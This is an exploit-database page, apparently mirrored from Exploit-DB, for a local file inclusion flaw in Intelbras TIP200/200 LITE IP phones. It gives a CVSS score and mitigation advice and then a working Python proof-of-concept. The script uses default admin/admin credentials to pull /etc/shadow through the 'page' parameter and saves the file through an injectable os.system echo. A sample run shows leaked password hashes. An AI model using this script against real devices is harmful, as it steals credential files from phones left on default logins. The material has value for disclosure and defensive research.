header-logo
Suggest Exploit
vendor:
TELEFONE IP TIP200/200 LITE
by:
Matheus Goncalves
5.5
CVSS
MEDIUM
Local File Include
CWE
Product Name: TELEFONE IP TIP200/200 LITE
Affected Version From: 60.0.75.29
Affected Version To: 60.0.75.29
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Debian
2018

INTELBRAS TELEFONE IP TIP200/200 LITE Local File Include

This exploit allows an attacker to include local files by manipulating the 'page' parameter in the URL. The attacker needs admin credentials to download files. The exploit author used default credentials to demonstrate the vulnerability.

Mitigation:

The vendor should release a patch to fix the local file include vulnerability. Users should change the default admin credentials and update to the latest version of the software.
Source

Exploit-DB raw data:

# Exploit Title: [INTELBRAS TELEFONE IP TIP200/200 LITE Local File Include]
# Google Dork: []
# Date: 16/03/2018
# Exploit Author: [Matheus Goncalves - anhax0r]
# Vendor Homepage: [https://www.facebook.com/anhaxteam/]
# Software Link: []
# Version: [60.0.75.29] (REQUIRED)
# Tested on: [Debian]
# CVE : [if applicable]


#Remember that you need login with admin credentials to download files !!! in this case, i used default credentials

import requests as http
import subprocess
import os
from requests.auth import HTTPBasicAuth
def poc():
    print("""                -------------------------------------------------------------------------------------------------------------
                ------------- 0day: TELEFONE IP TIP200/200 LITE | Local File Include | Local File Download-------------------
                -------------      P0c Author: Matheus Goncalves | Pentester at Anhax Security Team       -------------------
                -------------------------------------------------------------------------------------------------------------\n""")
    filename = raw_input("filename Ex: /etc/shadow: -> ")
    if(filename == ""):
        filename="/etc/shadow"
    r = http.get("http://192.168.0.207/cgi-bin/cgiServer.exx?page="+str(filename), auth=HTTPBasicAuth('admin', 'admin'))
    print(" ")
    text = r.text
    
    print(text)
    savefile = raw_input("Save file? [Y\\n]: ")
    savefile.upper()
    if(savefile=="Y" or savefile=="y"):
        os.system("echo '"+text+"' > "+filename.replace("/etc/", ""))
        print("File saved !!")
        start()
    else:
        start()
            
def start():
    poc()
    
start()


#root@hax:~/itscanner# python p0c.py 
#                -------------------------------------------------------------------------------------------------------------
#                ------------- 0day: TELEFONE IP TIP200/200 LITE | Local File Include |-------------------
#                -------------      P0c Author: Matheus Goncalves | Pentester at Anhax Security Team       -------------------
#                -------------------------------------------------------------------------------------------------------------
#filename Ex: /etc/shadow: -> /etc/shadow
 
#root:$1$83hUAZ/2$GKlGOZlepa6eikA6mfG1l/:11876:0:99999:7:::
#admin:DP7Kg4tE0Y9rs:11876:0:99999:7:::

#Save file? [Y\n]: y
#File saved !!

#root@hax:~/itscanner# cat shadow 
#root:$1$83hUAZ/2$GKlGOZlepa6eikA6mfG1l/:11876:0:99999:7:::
#admin:DP7Kg4tE0Y9rs:11876:0:99999:7:::
cqrsecured